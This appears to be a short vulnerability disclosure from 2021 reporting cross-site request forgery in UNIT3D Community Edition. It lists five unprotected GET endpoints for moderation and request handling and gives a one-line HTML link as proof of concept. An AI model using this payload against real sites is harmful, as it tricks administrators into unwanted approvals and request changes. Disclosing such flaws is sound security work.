Cross-Site Request Forgery (CSRF) in hdinnovations/unit3d-community-editionValid
Nov 15th 2021
More unprotected CSRF endpoints that allows for state-changing operations.
1: GET /dashboard/moderation/1/approve
2: GET /requests/1/accept
3: GET /requests/1/reject
4: GET /requests/1/unclaim
5: GET /requests/1/reset
Proof of Concept
<a href="UNIT3D-URL]/dashboard/moderation/1/approve">CLICK ME!</a>[
This vulnerability is capable of tricking admin users to accept / reject / unclaim / reset requests and admin users to approve stuff.